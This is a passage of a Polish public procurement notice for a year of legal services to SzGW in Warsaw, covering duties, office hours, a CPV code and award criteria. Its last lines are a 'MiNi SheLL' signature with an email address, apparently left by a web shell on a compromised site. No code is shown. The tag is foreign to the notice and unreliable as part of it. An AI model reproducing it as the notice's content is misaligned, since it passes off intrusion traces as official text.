4	występowanie w postępowaniu administracyjnym i sądowo-administracyjnym przed właściwymi organami, w tym sporządzanie pism procesowych przed organami pierwszej i drugiej instancji oraz sporządzanie skarg kasacyjnych;
5	sporządzanie opinii prawnych i udzielanie porad prawnych w tym w szczególności: 
a	z zakresu obronności i bezpieczeństwa państwa; 
b	prawa geodezyjnego i kartograficznego;
c	prawa cywilnego; 
d	kodeksu pracy; 
e	innych przepisów prawa powszechnie obowiązującego z uwzględnieniem specyfiki przepisów wojskowych dla potrzeb bieżącej działalności statutowej SzGW; 
6	wykonywanie zastępstwa prawnego i procesowego w postępowaniu egzekucyjnym
i egzekucji administracyjnej; 
7	wykonywanie zastępstwa prawnego przed innymi organami orzekającymi i organami administracji państwowej i samorządowej; 
8	sprawowanie nadzoru nad prowadzonymi postępowaniami administracyjnymi 
w zakresie ustawy o służbie wojskowej żołnierzy zawodowych; 
9	przygotowywanie informacji o nowych przepisach prawnych; 
10	innych czynności wg. potrzeb SzGW związanych z obsługą prawną; 

WYMAGANIA
1	dyżur - obsługa prawna świadczona będzie osobiście jeden raz w tygodniu 
 wtorek, od 8:00 do 12:00 w siedzibie SzGW w Warszawie przy 
ul. Al. Jerozolimskie 97;
2	telefonicznie - w pozostałe dni możliwość niezwłocznej konsultacji telefonicznej, a przypadku, jeżeli charakter pytania wskazuje na konieczność dokonania analizy przepisów prawa w terminie nie dłuższym niż dwa dni robocze;
3	za pomocą poczty elektronicznej lub faxu - w ciągu 2 dni roboczych od chwili wysłania;
4	pocztą tradycyjną - w terminie 7 dni od dnia doręczenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.11.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. doświadczenie Wykonawcy - 15</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com